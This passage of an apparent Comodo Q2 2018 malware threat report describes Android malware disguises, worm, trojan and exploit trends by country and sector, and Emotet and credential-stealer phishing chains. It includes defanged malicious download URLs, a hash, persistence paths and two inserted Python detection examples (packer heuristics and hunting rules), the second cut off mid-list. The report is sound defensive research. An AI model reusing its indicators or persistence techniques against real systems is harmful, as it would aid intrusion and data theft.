Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot
Reccoder-Call, QRCodeBar Scanner APK
Let me love you ringtone, Iphone Ringtone, Night light
Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via ... another cryptominer named CoinMiner.
How is that possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim herself. Thief robbing thief.
This story clearly illustrates the state of cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018 The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led to the arrest of 10 people by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected in Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote att attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
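Two signals an analyst checks for packing before running a sample are packer-style section names in the PE header (UPX writes UPX0/UPX1) and the high Shannon entropy that compressed or encrypted section contents show. The following is an added example, not Comodo's tooling; the PE images are constructed in memory, the 7.0 bits-per-byte threshold and the section-name list are assumptions, and no real code is embedded.

```python
"""Packer heuristics for PE files: packer section names plus section entropy.
Added example, not Comodo's tooling. Sample images are constructed below."""
import hashlib
import math
import struct
from collections import Counter

# Section names that well-known packers leave in the PE header (assumed list).
PACKER_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".UPX0", b".UPX1"}
HIGH_ENTROPY = 7.0   # bits per byte; plain x86 code is usually 5-6.5, packed data near 8


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Yield (name, raw_bytes) per section, decoding only the PE/COFF fields
    needed: e_lfanew, NumberOfSections, SizeOfOptionalHeader and the
    SizeOfRawData/PointerToRawData pair of each 40-byte section header."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0")
        size_raw, ptr_raw = struct.unpack_from("<II", pe, hdr + 16)
        yield name, pe[ptr_raw:ptr_raw + size_raw]


def packer_indicators(pe: bytes) -> dict:
    """Combine both heuristics into one verdict for a PE image."""
    names, max_entropy = [], 0.0
    for name, data in parse_sections(pe):
        names.append(name)
        max_entropy = max(max_entropy, shannon_entropy(data))
    hits = sorted(n.decode() for n in names if n in PACKER_SECTION_NAMES)
    return {
        "packer_sections": hits,
        "max_section_entropy": round(max_entropy, 2),
        "likely_packed": bool(hits) or max_entropy >= HIGH_ENTROPY,
    }


def build_pe(sections) -> bytes:
    """Constructed minimal PE32 image: DOS header, PE signature, COFF header,
    zeroed optional header, section table, then the raw section data."""
    opt_size, num = 224, len(sections)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, num, 0, 0, 0, opt_size, 0x102)
    out = bytearray(dos + b"PE\0\0" + coff + b"\0" * opt_size)
    ptr = len(out) + 40 * num                                   # first raw-data offset
    for name, data in sections:
        out += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(data), ptr, len(data), ptr, 0, 0, 0, 0, 0x60000020)
        ptr += len(data)
    for _, data in sections:
        out += data
    return bytes(out)


# Constructed sample contents: repetitive instruction-like bytes (low entropy)
# versus pseudo-random bytes standing in for compressed code (high entropy).
PLAIN_CODE = b"\x55\x8b\xec\x83\xec\x10\x90" * 600
RANDOM_LIKE = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))

SAMPLE_PLAIN = build_pe([(b".text", PLAIN_CODE), (b".data", b"\0" * 512)])
SAMPLE_PACKED = build_pe([(b"UPX0", b""), (b"UPX1", RANDOM_LIKE)])

if __name__ == "__main__":
    for label, image in (("plain", SAMPLE_PLAIN), ("packed", SAMPLE_PACKED)):
        print(label, packer_indicators(image))
```

Either signal alone is only a hint: legitimate installers are often packed too, so the verdict should route a sample to unpacking and closer analysis rather than to a block.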
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the acceleration of cybercriminals' bias to hunt for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
2 Trojans going on the offensive to hunt for confidential data
The second quarter of 2018 brought a sudden change in malware competition: Trojans squeezed out other malware types and jumped to the top of the charts. Gaining the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape. Their appearance makes cybersecurity departments and individual users update their defense tactics.
Malware Distribution by Type
Why are these changes inevitable?
Trojans are a special kind of malware. Their distinguishing feature is universality: they are most effective at providing a diversity of attacks, stealing data, implanting ransomware, adware or cryptominers, or even completely crashing systems.
Another special feature of trojans is covert activity. An owner of a trojan-infected machine can remain unaware of the attack for a long time, during which the trojan is an active malefactor.
Hence the need for a new approach to defense tactics appears. Let's have a closer look at the most active, vicious players of the trojan team to deeply understand what harm they can do to your computers if they sneak inside.
Distribution of top 30 Malware Families
In this list of the 30 top malware families, where trojans overwhelmingly dominate, you can find samples of this malware exhibiting diverse types of malicious activity.
For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. And the downloaded malware can be of any type.
Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website to infect users with other types of malware.
TrojWare.JS.Faceliker just clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites. Then, when infected users open Facebook, Faceliker hijacks their "likes".
TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminal Command-and-Control server.
TrojWare.Win32.Injector uses process injection as the main technique to take malicious actions. It's mostly used to bypass security products.
TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It's usually spread via a phishing email.
Such diversity of malicious activity of trojans, and their special ability to hide, have always made them one of the hardest malware types to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.
First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims to supply their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data and then sending it to cybercriminals' servers.
The accompanying graph shows the most popular malware spread via email. Note that 18 of 20 are trojans.
Distribution of Phishing Families of Malware
2.1 The Most Widespread Trojan
The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.
If a user takes the bait and runs the file, it copies itself to the AppData folder as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.
It collects credentials and private data from known browsers, email clients, FTP clients, WebDav and SCP clients. Then it sends all the collected data to the attackers' server, httpcallbedmlpackfarefrephp.
The phishing email
2.2 PowerShell-based attack with Emotet
Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware based not on native Windows .exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.
Emotet is one of the most aggressive trojans currently acting in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.
The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice that the message is written in a cheerful manner to inspire user trust.
The phishing email
The attached file is an Office document containing a VBScript. As the settings of a newly installed Microsoft Office do not allow execution of such scripts by default, the attackers added a special option to convince the victims to turn on VBScript execution.
The special option to convince the victims to turn on VBScript execution
The purpose of the VBScript is to launch PowerShell.
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r and hxxpairmaxxrswIdY.
At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service, "lanesviewer", to ensure persistence.
The malware creates the "lanesviewer" service to ensure persistence
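The two persistence patterns described in sections 2.1 and 2.2 (a payload copied to the AppData root under a hex-only name and launched from there, and a freshly installed service whose binary sits in a Windows system directory without being a known service) can be turned into hunting rules over process-creation and service-install events. The following is an added example, not Comodo's detection logic; the event records are constructed from the paths quoted in the report, the user name and the known-service baseline are made up, and the rule thresholds are assumptions.

```python
"""Hunting rules for the AppData hex-name dropper and the unknown system
service patterns described in this report. Added example, not Comodo's code.
Event records and the baseline allowlist below are constructed."""
import re
from pathlib import PureWindowsPath

# A basename of eight or more hex digits (assumed threshold) and nothing else.
HEX_NAME = re.compile(r"^[0-9a-f]{8,}\.exe$", re.IGNORECASE)
APPDATA_ROOTS = {("appdata", "roaming"), ("appdata", "local")}
SYSTEM_DIRS = {("windows", "system32"), ("windows", "syswow64")}

# Constructed baseline: service binaries the organisation expects to see.
KNOWN_SERVICE_BINARIES = {"svchost.exe", "spoolsv.exe", "msiexec.exe"}


def dropped_in_appdata_root(image: str) -> bool:
    """True when a process image is a hex-named .exe sitting directly under
    AppData\\Roaming or AppData\\Local, not inside an application subfolder."""
    p = PureWindowsPath(image)
    parent = tuple(part.lower() for part in p.parent.parts)
    return parent[-2:] in APPDATA_ROOTS and bool(HEX_NAME.match(p.name))


def unknown_system_service(image_path: str) -> bool:
    """True when a service binary lives in System32/SysWOW64 but its name is
    not in the baseline of known service binaries."""
    p = PureWindowsPath(image_path)
    parts = tuple(part.lower() for part in p.parts)
    return parts[1:3] in SYSTEM_DIRS and p.name.lower() not in KNOWN_SERVICE_BINARIES


def evaluate(events):
    """Apply both rules to Sysmon/System-log style records; return findings
    as (rule_name, detail) tuples in event order."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create" and dropped_in_appdata_root(ev["image"]):
            findings.append(("appdata_hex_dropper", ev["image"]))
        elif ev["type"] == "service_install" and unknown_system_service(ev["image_path"]):
            findings.append(("unknown_system_service",
                             f'{ev["service_name"]} -> {ev["image_path"]}'))
    return findings


# Constructed sample events: the first and third use paths from the report,
# the second and fourth are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"type": "process_create",
     "image": r"C:\Users\alice\AppData\Roaming\D5E2DEE36C7A.exe"},
    {"type": "process_create",
     "image": r"C:\Users\alice\AppData\Local\Programs\Editor\editor.exe"},
    {"type": "service_install", "service_name": "lanesviewer",
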